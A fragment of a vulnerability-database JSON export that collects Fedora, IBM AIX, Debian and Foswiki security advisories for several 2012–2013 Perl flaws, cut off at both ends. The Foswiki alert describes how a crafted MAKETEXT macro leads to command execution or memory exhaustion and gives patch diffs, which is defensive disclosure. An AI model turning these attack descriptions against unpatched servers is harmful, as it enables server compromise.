"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-02-19T01:37:56", "published": "2013-02-19T01:37:56", "id": "FEDORA:942C320E6D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.3-221.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-01-30T00:54:03", "published": "2013-01-30T00:54:03", "id": "FEDORA:D263821ACF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-237.fc18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5526"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2012-12-13T05:55:07", "published": "2012-12-13T05:55:07", "id": "FEDORA:A41D220E62", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.3-218.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5526"], "description": "CGI.pm is a stable, complete and mature solution for processing and prepari ng HTTP requests and responses. Major features including processing form submissions, file uploads, reading and writing cookies, query string genera tion and manipulation, and processing and preparing HTTP headers. Some HTML generation utilities are included as well. CGI.pm performs very well in in a vanilla CGI.pm environment and also comes with built-in support for mod_perl and mod_perl2 as well as FastCGI. ", "modified": "2012-12-13T05:55:07", "published": "2012-12-13T05:55:07", "id": "FEDORA:946BE20D99", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-CGI-3.52-218.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5526"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2012-12-12T00:28:27", "published": "2012-12-12T00:28:27", "id": "FEDORA:0ED87214CE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-235.fc18", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "aix": [{"lastseen": "2020-04-22T00:52:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nIBM SECURITY ADVISORY\n\nFirst Issued: Wed Nov 20 13:06:27 CST 2013\n|Updated: Wed Dec 4 10:00:31 CST 2013\n|Update: Corrected CVSS scoring information for CVEs\n|Update: Includes AIX 5.3 in appropriate places\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/perl_advisory3.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Security vulnerabilities in Perl for AIX\n\n| PLATFORMS: 5.3, 6.1 and 7.1\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below.\n\nCVE Number: CVE-2012-5526 \n CVE-2013-1667\n\nReboot required? NO\nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n CVE-2012-5526\n -------------\n Perl does not properly escape newlines in (1) Set-Cookie or (2) P3P \n headers, which might allow remote attackers to inject arbitrary headers \n into responses from applications that use CGI.pm\n\n CVE-2013-1667\n -------------\n The rehash mechanism in Perl 5.8.2 through 5.16.x allows \n context-dependent attackers to cause a denial of service (memory \n consumption and crash) via a crafted hash key.\n\nII. CVSS\n\n| CVE-2012-5526\n| CVSS Base Score: 4.3\n| CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/80098 for\n| the current score\n| CVSS Environmental Score*: Undefined\n| CVSS String: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n| CVE-2013-1667\n| CVSS Base Score: 4.3\n| CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/82598 for the\n| current score\n| CVSS Environmental Score*: Undefined\n| CVSS String:(AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n To determine if your system is vulnerable, run the following\n command:\n\n # lslpp -l perl.rte\n\n The following fileset levels are vulnerable:\n\n AIX Fileset AIX Level Lower Level Upper Level\n ----------------------------------------------------------------\n| perl.rte 5.3.12 5.8.8.0 5.8.8.123\n perl.rte 6.1.7 5.8.8.0 5.8.8.122\n perl.rte 6.1.8 5.8.8.0 5.8.8.244\n perl.rte 7.1.1 5.10.1.0 5.10.1.100\n perl.rte 7.1.2 5.10.1.0 5.10.1.150\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability\n ---------------------------------------------------\n| 5.3.12 IV43973 NOW\n 6.1.8 IV43973 NOW\n 7.1.2 IV46765 NOW\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV43973\n http://www.ibm.com/support/docview.wss?uid=isg1IV46765\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via http\n from:\n\n\t\thttps://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\n\n\t\tThe perl name provided in the web pack site\n| For 5.3:\tperl61.zip\n For 6.1:\tperl61.zip\n For 7.1:\tperl71.zip\n\n To extract the fixes from the zip files:\n\n| For 5.3: \tgunzip -S .zip perl61.zip\n For 6.1: \tgunzip -S .zip perl61.zip\n For 7.1:\tgunzip -S .zip perl71.zip\n\n\t\tIMPORTANT: It is recommended that a mksysb backup of the system be\n\t\tcreated. Verify that this image is both bootable and readable\n\t\tbefore proceeding.\n\n\t\tTo preview the fix installation:\n\n \t\t\tinstallp -apYd . perl\t\t\t\n\n\t\tTo install the fix package:\n\t\n\t\t\tinstallp -aXYd . perl\n\t\t\nV. WORKAROUNDS\n\n There are no workarounds.\n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n C. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\nVII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n| X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/80098\n| X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/82598\n CVE-2012-5526: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5526\n CVE-2013-1667: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1667\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (AIX)\n\niEYEARECAAYFAlKfsRYACgkQ4fmd+Ci/qhIKJQCff1qIjiUT9DQ4psgBq2Nyx/tD\nEnMAmwUQKbqT0QRty7dMeNNHpNX5oEbS\n=2MWR\n-----END PGP SIGNATURE-----\n", "edition": 11, "modified": "2013-12-04T10:00:31", "published": "2013-11-20T13:06:27", "id": "PERL_ADVISORY3.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/perl_advisory3.asc", "title": "Security vulnerabilities in Perl for AIX,Security vulnerabilities in Perl for VIOS", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-22T00:52:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nIBM SECURITY ADVISORY\n\nFirst Issued: Wed Apr 23 17:08:11 CST 2014\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\nhttps://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\nftp://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Security vulnerability in Perl for AIX\n\nPLATFORMS: 5.3, 6.1, and 7.1\n VIOS 2.2.1\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below.\n\nCVE Number: CVE-2012-6329\n\nReboot required? NO\nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n CVE-2012-6329\n -------------\n The _compile function in Maketext.pm in the Locale::Maketext implementation\n in Perl before 5.17.7 does not properly handle backslashes and fully \n qualified method names during compilation of bracket notation, which allows\n context-dependent attackers to execute arbitrary commands via crafted input\n to an application that accepts translation strings from users.\n\nII. CVSS\n\n CVE-2012-6329\n CVSS Base Score: 7.5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/80566 for\n the current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n The following fileset levels are vulnerable:\n\n AIX Fileset AIX Level Lower Level Upper Level\n ----------------------------------------------------------------\n perl.rte 5.3.12 5.8.8.0 5.8.8.123\n perl.rte 6.1.7 5.8.8.0 5.8.8.122\n perl.rte 6.1.8 5.8.8.0 5.8.8.244\n perl.rte 6.1.9 5.8.8.0 5.8.8.366\n perl.rte 7.1.1 5.10.1.0 5.10.1.100\n perl.rte 7.1.2 5.10.1.0 5.10.1.150\n perl.rte 7.1.3 5.10.1.0 5.10.1.200\n\n VIOS\n ----------------------------------------------------------------\n perl.rte versions 5.8.8.0 to 5.8.8.366 on VIOS 2.2.1.0 and above.\n\n Note: To find out whether the affected filesets are installed on your\n systems, refer to the lslpp command found in AIX user's guide.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability\n ---------------------------------------------------\n 5.3 IV56641 NOW\n 6.1 IV56641 NOW\n 7.1 IV56642 NOW\n\n VIOS Level APAR number Availability\n ---------------------------------------------------\n 2.2.1.0 and up IV56641 NOW\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV56641\n http://www.ibm.com/support/docview.wss?uid=isg1IV56642\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via http\n from:\n\n\t\thttps://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\n\n\t\tThe perl name provided in the web pack site\n For 5.3:\tperl61.zip\n For 6.1:\tperl61.zip\n For 7.1:\tperl71.zip\n For VIOS: perl61.zip\n\n To extract the fixes from the zip files:\n For 5.3: \tgunzip -S .zip perl61.zip\n For 6.1: \tgunzip -S .zip perl61.zip\n For 7.1:\tgunzip -S .zip perl71.zip\n For VIOS: gunzip -S .zip perl61.zip\n\n\t\tIMPORTANT: It is recommended that a mksysb backup of the system be\n\t\tcreated. Verify that this image is both bootable and readable\n\t\tbefore proceeding.\n\n\t\tTo preview the fix installation:\n\n \t\t\tinstallp -apYd . perl\t\t\t\n\n\t\tTo install the fix package:\n\t\n\t\t\tinstallp -aXYd . perl\n\t\t\nV. WORKAROUNDS\n\n There are no workarounds.\n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n C. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\nVII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/80566\n CVE-2012-6329: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (AIX)\n\niEYEARECAAYFAlNYLGwACgkQ4fmd+Ci/qhIkcwCdGTeDNw2OsdOucTB+DatOm1Xd\nzNgAn2rexeS9aaXvG+PawwR0WGgEK7p0\n=d7gB\n-----END PGP SIGNATURE-----\n", "edition": 15, "modified": "2014-04-23T17:08:11", "published": "2014-04-23T17:08:11", "id": "PERL_ADVISORY4.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc", "title": "Security Vulnerability in Perl _compile", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:28:09", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2586-1 security@debian.org\nhttp://www.debian.org/security/ \nDecember 11, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : perl\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5195 CVE-2012-5526\nDebian Bug : 689314 693420 695223\n\nTwo vulnerabilities were discovered in the implementation of the Perl\nprogramming language:\n\nCVE-2012-5195\n\tThe &quot;x&quot; operator could cause the Perl interpreter to crash\n\tif very long strings were created.\n\nCVE-2012-5526\n\tThe CGI module does not properly escape LF characters\n\tin the Set-Cookie and P3P headers.\n\nIn addition, this update adds a warning to the Storable documentation\nthat this package is not suitable for deserializing untrusted data.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 5.10.1-17squeeze4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.14.2-16.\n\nWe recommend that you upgrade your perl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-12-11T19:11:33", "published": "2012-12-11T19:11:33", "id": "DEBIAN:DSA-2586-1:65FFB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00230.html", "title": "[SECURITY] [DSA 2586-1] perl security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "description": "\r\n\r\n---+ Security Alert: Code injection vulnerability in MAKETEXT macro,\r\nDenial of Service vulnerability in MAKETEXT macro.\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext, which Foswiki uses to provide translations\r\nwhen {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to run arbitrary shell commands and code on the server through a\r\ncrafted &#37;MAKETEXT&#37; macro. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam as documented in Development.SecurityAlertProcess\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll released versions of Foswiki are vulnerable to these issues\r\n\r\n - Foswiki 1.0.0 - 1.0.10\r\n - Foswiki 1.1.0 - 1.1.6\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2012-6329 to this vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\r\nCVE-2012-6330 was assigned to the Denial of Service vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6330\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization &#40;typically port 80/TCP&#41;. Typically, prior\r\nauthentication is necessary.\r\n\r\nA crafted &#37;MAKETEXT{}&#37; macro will pass through strings to\r\nLocale::Maketext where they are executed under the control of the CGI\r\nuser on the server. Any user with the authority to edit a topic,\r\ncomment on a topic, or execute the Foswiki rendering code &#40;eg. The\r\nRenderPlugin&#41; can take advantage of the vulnerability. &#40;CVE-2012-6329&#41;\r\n\r\nA crafted &#37;MAKETEXT{}&#37; macro will consume large amounts of memory and\r\nexhaust swap space. &#40;CVE-2012-6330&#41;\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server can expose the file system.\r\n\r\nA second less severe Denial of Service vulnerability is also addressed\r\nby this alert.\r\n\r\n---++ Details\r\n\r\nA crafted &#37;MAKETEXT{}&#37; macro can cause multiple issues:\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext.\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to &#37;&lt;nop&gt;MAKETEXT{}&#37; not validating the parameter numbers\r\nsupplied in the [_nnn] tokens.\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin [_nnn] tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nOne of the following should be done as soon as possible.\r\n\r\n * Manually Apply hotfix &#40;see patch below&#41;. __or__\r\n * Apply the\r\n[[Extensions.PatchItem12285Contrib][http://foswiki.org/Extensions/PatchItem12285Contrib]]\r\nto your Foswiki 1.1.x system &#40;Does not apply to Foswiki 1.0.x&#41; __or__\r\n * Disable {UserInerfaceInternationalization} in your LocalSite.cfg\r\n_&#40;Does not protect against [[SecurityAlert-CVE-2012-6330]]&#41;_ __or__\r\n * The foswiki debian package has already been updated with the hotfix\r\n- use your preferred package management tool to update to foswiki 1.1.6-2\r\n\r\nIn addition, CPAN:Locale::Maketext version 1.23 or newer should be\r\ninstalled.\r\n\r\nUpgrade to the latest patched production Download.FoswikiRelease01x01x07\r\nonce released\r\n\r\n*The Foswiki patch fixes other issues with the &#37;MAKETEXT&#37; macro beyond\r\nthe code execution issue. Even if the new Locale::Maketext is installed,\r\nit is strongly recommended to apply the Foswiki patch.*\r\n\r\n\r\n---++ Hotfix for Foswiki Release 1.1.0 - 1.1.6\r\n\r\nInstall http://foswiki.org/Extensions.PatchItem12285Contrib and verify\r\nthat the patch has been applied to lib/Foswiki/Macros/MAKETEXT.pm. The\r\nextension will attempt to apply two patches, and should report that 1\r\nfile was patched. Only one of the patches will match your system. This\r\npatch fixes both CVE-2012-6329 CVE-2012-6330.\r\n\r\n&gt; Running Post-install exit for PatchItem12285Contrib...\r\n&gt; Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-001.patch\r\n&gt; ...\r\n&gt; MD5 Matched - applying patch version Foswiki 1.1.0 - 1.1.2.\r\n&gt; Update successful for /var/www/data/Foswiki-1.1.0/lib/Foswiki/Macros/MAKETEXT.pm\r\n&gt; .\r\n&gt; 1 file patched\r\n&gt; ...\r\n&gt; Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-002.patch\r\n&gt; ...\r\n&gt; No files matched patch signatures\r\n\r\n\r\nOn a properly patched system, &#37;MAKETEXT{&quot; [_101] &quot;}&#37; should return an\r\nerror.\r\n&gt; Excessive parameter number 101, MAKETEXT rejected. \r\n\r\nNote that this Contrib will also install the\r\nExtensions.PatchFoswikiContrib as a prerequisite. PatchFoswikiContrib\r\npatches the Extensions installer to accept the new style version strings\r\nused for modules released as of 1.1.6.\r\n\r\n---++ Hotfix for Foswiki Archived Release 1.0.0-1.0.10\r\n\r\nThis patch fixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]].\r\n\r\nThis release should be manually patched.\r\n\r\nIn Foswiki.pm, in the sub MAKETEXT\r\n\r\n============ vvv CUT vvv =============\r\n--- Foswiki.pm 2010-01-17 09:16:20.000000000 -0500\r\n+++ Foswiki.pm 2012-12-10 10:06:37.389129654 -0500\r\n@@ -4200,6 +4200,9 @@\r\n $str =~\r\n s/~&#92;[&#40;&#92;*,&#92;_&#40;&#92;d+&#41;,[^,]+&#40;,&#40;[^,]+&#41;&#41;?&#41;~&#92;]/ $max = $2 if &#40;$2 &gt; $max&#41;; &quot;[$1]&quot;/ge;\r\n+ return &quot;Illegal parameter number&quot; if &#40;$max &gt; 100&#41;;\r\n+ $str =~ s#&#92;&#92;#&#92;&#92;&#92;&#92;#g;\r\n+\r\n # get the args to be interpolated.\r\n my $argsStr = $params-&gt;{args} || &quot;&quot;;\r\n\r\n============ ---CUT--- =============\r\n\r\n\r\n---++ Manual patch for Foswiki Release 1.1.0 -&gt; 1.1.6\r\n\r\nInstalling the Extensions.PatchItem12285Contrib is the best way to patch\r\nyour system - you can however see the patch we apply here. This patch\r\nfixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]]:\r\n\r\n============ vvv CUT vvv =============\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:51:12.959268829 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:37:31.674486503 -0500\r\n @@ -4,9 +4,19 @@\r\n use strict;\r\n use warnings;\r\n+use Locale::Maketext;\r\n+my $escape =\r\n+ &#40; $Foswiki::cfg{UserInterfaceInternationalisation}\r\n+ &amp;&amp; $Locale::Maketext::VERSION\r\n+ &amp;&amp; $Locale::Maketext::VERSION &lt; 1.23 &#41;;\r\n+\r\n sub MAKETEXT {\r\n my &#40; $this, $params &#41; = @_;\r\n+ my $max;\r\n+ my $min;\r\n+ my $param_error;\r\n+\r\n my $str = $params-&gt;{_DEFAULT} || $params-&gt;{string} || &quot;&quot;;\r\n return &quot;&quot; unless $str;\r\n @@ -18,15 +28,22 @@\r\n $str =~ s/~~&#92;[/~[/g;\r\n $str =~ s/~~&#92;]/~]/g;\r\n+ $max = 0;\r\n+ $min = 1;\r\n+ $param_error = 0;\r\n+\r\n # unescape parameters and calculate highest parameter number:\r\n- my $max = 0;\r\n- $str =~ s/~&#92;[&#40;&#92;_&#40;&#92;d+&#41;&#41;~&#92;]/ $max = $2 if &#40;$2 &gt; $max&#41;; &quot;[$1]&quot;/ge;\r\n+ $str =~ s/~&#92;[&#40;&#92;_&#40;&#92;d+&#41;&#41;~&#92;]/_validate&#40;$1, $2, $max, $min,\r\n$param_error&#41;/ge;\r\n $str =~\r\n-s/~&#92;[&#40;&#92;*,&#92;_&#40;&#92;d+&#41;,[^,]+&#40;,&#40;[^,]+&#41;&#41;?&#41;~&#92;]/ $max = $2 if &#40;$2 &gt; $max&#41;; &quot;[$1]&quot;/ge;\r\n+s/~&#92;[&#40;&#92;*,&#92;_&#40;&#92;d+&#41;,[^,]+&#40;,&#40;[^,]+&#41;&#41;?&#41;~&#92;]/ _validate&#40;$1, $2, $max, $min,\r\n$param_error&#41;/ge;\r\n+ return $str if &#40;$param_error&#41;;\r\n # get the args to be interpolated.\r\n my $argsStr = $params-&gt;{args} || &quot;&quot;;\r\n+ # Escape any escapes.\r\n+ $str =~ s#&#92;&#92;#&#92;&#92;&#92;&#92;#g if &#40;$escape&#41;; # escape any escapes\r\n+\r\n my @args = split&#40; /&#92;s*,&#92;s*/, $argsStr &#41;;\r\n # fill omitted args with empty strings\r\n@@ -47,6 +64,26 @@\r\n return $result;\r\n }\r\n+sub _validate {\r\n+\r\n+ #my &#40; $contents, $number, $max, $min, $param_error &#41; = @_\r\n+\r\n+ $_[2] = $_[1] if &#40; $_[1] &gt; $_[2] &#41;; # Record maximum param number\r\n+ $_[3] = $_[1] if &#40; $_[1] &lt; $_[3] &#41;; # Record minimum param number\r\n+\r\n+ if &#40; $_[1] &gt; 100 &#41; {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+&quot;&lt;span class=&#92;&quot;foswikiAlert&#92;&quot;&gt;Excessive parameter number $_[2],\r\nMAKETEXT rejected.&lt;/span&gt;&quot;;\r\n+ }\r\n+ if &#40; $_[1] &lt; 1 &#41; {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+&quot;&lt;span class=&#92;&quot;foswikiAlert&#92;&quot;&gt;Invalid parameter &lt;code&gt;&#92;&quot;$_[0]&#92;&quot;&lt;/code&gt;,\r\nMAKETEXT rejected.&lt;/span&gt;&quot;;\r\n+ }\r\n+ return &quot;[$_[0]]&quot;; # Return the complete bracket parameter\r\nwithout escapes\r\n+}\r\n+\r\n 1;\r\n __END__\r\n Foswiki - The Free and Open Source Wiki, http://foswiki.org/\r\n\r\n============ ^^^ CUT ^^^ =============\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2012-12-05 - The Locale::Maketext vulnerability was discussed on\r\nthe Perl5Porters email list, triggered review of Foswiki code.\r\n * 2012-12-05 - Patched version &#40;1.23&#41; of Locale::Maketext is released.\r\n * 2012-12-08 - The [_999999] DoS issue identified and sent to foswiki\r\nsecurity list.\r\n * 2012-12-09 - The &quot;remote execution&quot; vulnerability in\r\nLocale::Maketext was confirmed on Foswiki.\r\n * 2012-12-09 - Requested the CVE from 